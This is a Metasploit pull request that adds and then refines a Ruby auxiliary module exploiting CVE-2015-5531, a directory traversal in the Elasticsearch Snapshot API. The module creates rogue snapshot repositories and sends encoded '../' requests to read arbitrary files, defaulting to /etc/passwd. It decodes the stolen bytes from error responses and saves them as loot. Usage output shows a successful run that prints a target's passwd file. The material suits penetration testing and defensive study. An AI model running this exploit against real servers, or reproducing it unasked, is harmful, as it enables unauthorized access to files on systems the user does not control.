### PR TITLE
Add Directory Traversal for Elasticsearch (CVE-2015-5531)

### DIFF
--- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb
+++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'json'
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ElasticSearch Snapshot API Directory Traversal',
+      'Description'    => %q{'This module exploits a directory traversal
+      vulnerability in ElasticSearch, allowing an attacker to read arbitrary
+      files with JVM process privileges, through the Snapshot API.
+      '},
+      'References'     =>
+        [
+          ['CVE', '2015-5531'],
+          ['URL', 'https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html']
+        ],
+      'Author'         =>
+        [
+          'Benjamin Smith', # Vulnerability discovery
+          'Pedro Andujar <pandujar[at]segfault.es>', # Metasploit module
+          'Jose A. Guasch <jaguasch[at]gmail.com>', # Metasploit module
+        ],
+      'License'        => MSF_LICENSE
+   ))
+
+    register_options(
+      [
+        Opt::RPORT(9200),
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [true, 'Traversal depth', 7])
+      ], self.class)
+
+    deregister_options('RHOST')
+  end
+
+  def proficy?
+    req1 = send_request_raw('method' => 'POST',
+                            'uri'    => '/_snapshot/pwn',
+                            'data' => '{"type":"fs","settings":{"location":"dsr"}}')
+
+    req2 = send_request_raw('method' => 'POST',
+                            'uri'    => '/_snapshot/pwnie',
+                            'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
+
+    if req1.body =~ /true/ && req2.body =~ /true/
+      return true
+    else
+      return false
+    end
+  end
+
+  def read_file(file)
+    travs = '_snapshot/pwn/ev1l%2f'
+
+    payload = '../' * datastore['DEPTH']
+
+    travs << payload.gsub('/', '%2f')
+    travs << file.gsub('/', '%2f')
+
+    print_status("#{peer} - Checking if it's a vulnerable ElasticSearch")
+
+    if proficy?
+      print_good("#{peer} - Check successful")
+    else
+      print_error("#{peer} - ElasticSearch not vulnearble")
+      return
+    end
+
+    print_status("#{peer} - Retrieving file contents...")
+
+    res = send_request_raw('method' => 'GET',
+                           'uri'    => travs)
+
+    if res && (res.code == 400)
+      return res.body
+    else
+      print_status("#{res.code}\n#{res.body}")
+      return nil
+    end
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ %r{/^\//}
+
+    contents = read_file(filename)
+
+    if contents.nil?
+      print_error("#{peer} - File not downloaded")
+      return
+    end
+
+    data_hash = JSON.parse(contents)
+    fcontent = data_hash['error'].scan(/\d+/).drop(2).map(&:to_i).pack('c*')
+    fname = datastore['FILEPATH']
+
+    path = store_loot(
+      'elasticsearch.traversal',
+      'text/plain',
+      ip,
+      fcontent,
+      fname
+    )
+    print_good("#{peer} - File saved in: #{path}")
+  end
+end
+

--- a/modules/auxiliary/scanner/http/elasticsearch_traversal.rb
+++ b/modules/auxiliary/scanner/http/elasticsearch_traversal.rb
@@ -14,14 +14,16 @@ class Metasploit3 < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'ElasticSearch Snapshot API Directory Traversal',
-      'Description'    => %q{'This module exploits a directory traversal
-      vulnerability in ElasticSearch, allowing an attacker to read arbitrary
-      files with JVM process privileges, through the Snapshot API.
-      '},
+      'Description'    => %q{
+        This module exploits a directory traversal
+        vulnerability in ElasticSearch, allowing an attacker to read arbitrary
+        files with JVM process privileges, through the Snapshot API.
+      },
       'References'     =>
         [
           ['CVE', '2015-5531'],
-          ['URL', 'https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html']
+          ['URL', 'https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html'],
+          ['PACKETSTORM', '132721']
         ],
       'Author'         =>
         [
@@ -43,15 +45,15 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def proficy?
-    req1 = send_request_raw('method' => 'POST',
+    res1 = send_request_raw('method' => 'POST',
                             'uri'    => '/_snapshot/pwn',
                             'data' => '{"type":"fs","settings":{"location":"dsr"}}')
 
-    req2 = send_request_raw('method' => 'POST',
+    res2 = send_request_raw('method' => 'POST',
                             'uri'    => '/_snapshot/pwnie',
                             'data' => '{"type":"fs","settings":{"location":"dsr/snapshot-ev1l"}}')
 
-    if req1.body =~ /true/ && req2.body =~ /true/
+    if res1.body =~ /true/ && res2.body =~ /true/
       return true
     else
       return false
@@ -66,24 +68,24 @@ class Metasploit3 < Msf::Auxiliary
     travs << payload.gsub('/', '%2f')
     travs << file.gsub('/', '%2f')
 
-    print_status("#{peer} - Checking if it's a vulnerable ElasticSearch")
+    vprint_status("#{peer} - Checking if it's a vulnerable ElasticSearch")
 
     if proficy?
-      print_good("#{peer} - Check successful")
+      vprint_good("#{peer} - Check successful")
     else
-      print_error("#{peer} - ElasticSearch not vulnearble")
+      vprint_error("#{peer} - ElasticSearch not vulnearble")
       return
     end
 
-    print_status("#{peer} - Retrieving file contents...")
+    vprint_status("#{peer} - Retrieving file contents...")
 
     res = send_request_raw('method' => 'GET',
                            'uri'    => travs)
 
-    if res && (res.code == 400)
+    if res && res.code == 400
       return res.body
     else
-      print_status("#{res.code}\n#{res.body}")
+      vprint_status("#{res.code}\n#{res.body}")
       return nil
     end
   end
@@ -99,7 +101,13 @@ class Metasploit3 < Msf::Auxiliary
       return
     end
 
-    data_hash = JSON.parse(contents)
+    begin
+      data_hash = JSON.parse(contents)
+    rescue JSON::ParserError
+      vprint_error("#{peer} - Unable to parse JSON")
+      return
+    end
+
     fcontent = data_hash['error'].scan(/\d+/).drop(2).map(&:to_i).pack('c*')
     fname = datastore['FILEPATH']
 
@@ -110,7 +118,8 @@ class Metasploit3 < Msf::Auxiliary
       fcontent,
       fname
     )
-    print_good("#{peer} - File saved in: #{path}")
+    vprint_good("#{peer} - File saved in: #{path}")
+
   end
 end
 


### PR DESCRIPTION
#### Module to read file via directory traversal in Elasticsearch

Application: Elasticsearch
Homepage: https://www.elastic.co/products/elasticsearch
Vulnerability: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2015-5531
#### Vulnerable packages

Elasticsearch versions from 1.0.0 to 1.6.0 are vulnerable
#### Usage:

```
msf > use auxiliary/scanner/http/elasticsearch_traversal
msf auxiliary(elasticsearch_traversal) > show options

Module options (auxiliary/scanner/http/elasticsearch_traversal):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DEPTH     7                yes       Traversal depth
   FILEPATH  /etc/passwd      yes       The path to the file to read
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     9200             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   VHOST                      no        HTTP server virtual host

msf auxiliary(elasticsearch_traversal) > info

       Name: ElasticSearch Snapshot API Directory Traversal
     Module: auxiliary/scanner/http/elasticsearch_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Benjamin Smith
  Pedro Andujar <pandujar@segfault.es>
  Jose A. Guasch <jaguasch@gmail.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DEPTH     7                yes       Traversal depth
  FILEPATH  /etc/passwd      yes       The path to the file to read
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                     yes       The target address range or CIDR identifier
  RPORT     9200             yes       The target port
  THREADS   1                yes       The number of concurrent threads
  VHOST                      no        HTTP server virtual host

Description:
  'This module exploits a directory traversal vulnerability in
  ElasticSearch, allowing an attacker to read arbitrary files with JVM
  process privileges, through the Snapshot API. '

References:
  http://cvedetails.com/cve/2015-5531/
  https://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html

msf auxiliary(elasticsearch_traversal) > set RHOSTS **********
RHOSTS => **********
msf auxiliary(elasticsearch_traversal) > run

[*] **********:9200 - Checking if it's a vulnerable ElasticSearch
[+] **********:9200 - Check successful
[*] **********:9200 - Retrieving file contents...
[+] **********:9200 - File saved in: /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(elasticsearch_traversal) > cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt
[*] exec: cat /home/msfdev/.msf4/loot/20151013131441_default_**********_elasticsearch.tr_809992.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
elasticsearch:x:107:113::/home/elasticsearch:/bin/false
msf auxiliary(elasticsearch_traversal) >
```
